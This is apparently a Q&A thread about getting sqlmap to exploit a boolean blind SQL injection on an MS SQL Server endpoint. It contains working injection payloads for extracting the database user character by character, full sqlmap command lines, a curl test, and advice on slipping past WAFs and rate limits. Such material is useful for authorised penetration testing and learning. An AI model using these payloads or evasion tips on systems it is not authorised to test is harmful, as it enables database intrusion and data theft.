# How to make sqlmap exploit an SQLi vulnerability

Tags: sql-injection, sqlmap

I have found a simple boolean blind SQL vulnerability and want to let sqlmap do the iterating for me but it doesn't seem to work, I have the impression it tries to start at a point that I'm far beyond.
Here are the details. The vulnerability is like this

```
http://host/path?param=123
```

and I can query like this

```
http://host/path?param=123' or 10 = (select len(system_user()));--
```

(URL encoded of course). If the second or condition is true I'll get somewhere in the response "Found 1000 hits". If it is false there will be "Found 0 hits". So now I can easily do a binary search with

```
http://host/path?param=123' or 100 < (select ascii(substring(system_user(), 1, 1));--
```

character per character (it is MS SQL Server in case you haven't noticed). This looks so bloody easy I cannot understand that sqlmap keeps telling me "param doesn't seem to be injectable". Here is the sqlmap call I've tried:

```
sqlmap -u "http://host/path?param=123" -p param --current-user --dbms mssql --prefix="123' or " --suffix=";--" --risk 3 --level 2
```

I've played with --risk, --level and --technique=B and also --string="Found 1000 hits". Nothing helps. How can I tell sqlmap to not search for anything but just do this silly iteration?

Answer (score 2, accepted):

Injection points as simple as your example can certainly be picked up by sqlmap.

Here are some troubleshooting ideas:

- Could the server use a WAF or otherwise react to the sqlmap user-agent (`sqlmap/x.x`)? Use `--user-agent` to specify the same user-agent as your browser has (or a generic one).
- Does the server react differently on rapid consecutive HTTP requests? You can use `--delay` to specify a delay interval between requests.
- For such a straightforward injection you usually don't need to specify `--prefix` and `--suffix`. Better omit them to not mess with sqlmap's own process of analysis.
- Try to omit `--dbms mssql` if you're not 100% sure about the backend DBMS. sqlmap can usually figure that out itself.
- Could the requests be authenticated or depend on some cookie settings you're unaware of? Use `--cookie` to add the same cookies that might be set in your browser.
- Debug the requests and responses by sqlmap and compare them with what you're getting in your browser. You can set a high [output verbosity](https://github.com/sqlmapproject/sqlmap/wiki/Usage#output-verbosity) level (e.g. `-v 6`) to overserve the entire HTTP traffic.
- Use `curl` to verify that the manual injection generally works outside your browser. E.g.:

  ```
  curl "http://host/path?param=123' or 10 = (select len(system_user()));--" | grep "1000 hits"
  ```

Comment: I have tested it in Burp and also extracted some data that way, so there definitely IS an SQL injection. From the functions I used (and which worked) I can say it is MSSQL.

Comment: Works now with the params --technique=B --level=5 --risk=3 --random-agent --dbms=MSSQL --delay 2 -p param. I was too careful not providing --risk = 5.

Answer (score 3):

Since you mentioned that you found a boolean based blind SQli, you will require a sqlmap input such as the one below:

```
#sqlmap -u "http://host/path?param=123" --technique=B --level=5 --risk=3 --random-agent --dbms=MSSQL
```

- --technique switch will force only Blind SQLi Attacks
- --random-agent will ensure you use a legit user agent, most of the vulnerabilties fail to get exploited if you don't provide this since
  the site may lock you out seeing an unknown agent
- Increase the level
- Also, your query doesnt have any other parameter so skip providing
  the parameter part and suffix and prefixes